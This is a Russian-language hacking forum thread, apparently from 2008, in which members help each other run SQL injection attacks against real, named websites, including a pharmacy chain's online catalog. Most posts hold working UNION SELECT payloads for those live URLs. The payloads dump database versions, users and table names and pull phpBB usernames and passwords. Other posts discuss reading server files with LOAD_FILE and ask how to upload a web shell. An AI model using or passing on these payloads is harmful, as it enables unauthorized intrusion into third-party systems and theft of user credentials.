Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 bag
    Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
    ascii(lower(substring((select+version( )),1,1)))=0x35/*
    Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
    Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи
     
    1 person likes this.
  2. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    jokester, спасибо за ответ, статьи читал, пишу скрипт, вывожу текст на страницу потом ищу его если есть то все ок, вот пытаюсь воткнуть как в этом методе это можно реализовать
     
    1 person likes this.
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    не проще
    PHP:
    and 5=substring(version(),1,1)
    ? =\
     
    _________________________
  4. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте, у меня два вопроса,
    Первый - Пожскажите пожалуйста какую нибудь бажную CMS не сложную в установке, чтобы можно было поставить на localhost и отработать заливку шелла например.

    Второе - я нашел уязвимый сайт и пытаюсь на нем прочесть файлы, путь до них беру из сообщения мускула об ошибке, но в место содержимого файла цифра за место каторой подставляю LOAD_FILE() просто не отбражается. Я уже и в hex кодировал, все равно не выводит файлы.

    Сам сайт -
    - так ошибка мускула
    - так цифра не отображается

    Там прав на чтение не хватает или что-то другое?
     
    #1304 Spaise, 22 Mar 2008
    Last edited: 22 Mar 2008
  5. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    _http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
    помогите раскрутить... ругается на from ..пробовал кодировать некатит...
     
  6. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    Spaise
    http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,user(),2,3/*
    web7_u1@localhost
    нет прав на чтение
     
  7. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    зато версия бд 5-ая
    5.0.32-Debian_7etch1-log
    можно раскрутить сам скуль..
     
  8. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    login: localhost
    Таблиц нет, я в этом не специалист, но раз мускул использует, значит все таки таблы есть. )
     
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    через куки from не фильтруется составляй свой запрос в куках, ну скорее и в пост не фильтруется
     
  10. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_schema.tables+limit+1,1/*
    меняй лимит получиш таблицы..
     
  11. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Мне не нужны таблици, я спрашивал про чтение файлов.
     
  12. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Непойму в чом прикол.
    выводит нормально
    выводит:
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    phpbb_users в другой бд

    id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10,11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*

    то что получится и будет бд, потом:
    id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*
     
  14. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    возвращает в первом запросе пустоту.
    + если беру на угад например:
    возвращает
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    попробуй без limit:
    id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'/*
     
    1 person likes this.
  16. Timati

    Timati Banned

    Joined:
    17 Mar 2008
    Messages:
    4
    Likes Received:
    11
    Reputations:
    -10
    Попробуй так :
    PHP:
    <?Govyuazhiy huy
    "Ebitnya";
    ?
    HUY>
     
  17. LolFEm

    LolFEm Elder - Старейшина

    Joined:
    8 Sep 2006
    Messages:
    160
    Likes Received:
    52
    Reputations:
    5
    ''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()
     
    1 person likes this.
  18. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Обошол!(/*)
    Спасибо всем кто помог, всем +5
     
    #1318 Dimi4, 22 Mar 2008
    Last edited: 22 Mar 2008
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ндя, нет там никакого экранирования, посмотри еще раз на ошибку, просто кавычка скриптом добавляется и все, т.е. надо отсекать ее с помощью комментов /*
     
  20. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Нашел скулю
    --------------------------
    Сеть аптечных магазинов!
    Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576


    5.0.22-log
    zdplus@localhost
    ---------------------------------
    information_schema.tables
    Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
    ----------------------------------
    вывожу колонки? например с zdp_usr
    получаю
    как я понял экранирования кавычек нет
    ------------------------------------
    но при попытке вывода колонок выплевует
    звездочки-заместо текста и ошибку
    ------------------------------------
    рас уж кавычки не фильтруются, значит как то можно залить шелл
    я шеллы еще не заливал-буду рад примеру
    ------------------------------------
     
    #1320 samarin, 22 Mar 2008
    Last edited: 22 Mar 2008
    1 person likes this.
Thread Status:
Not open for further replies.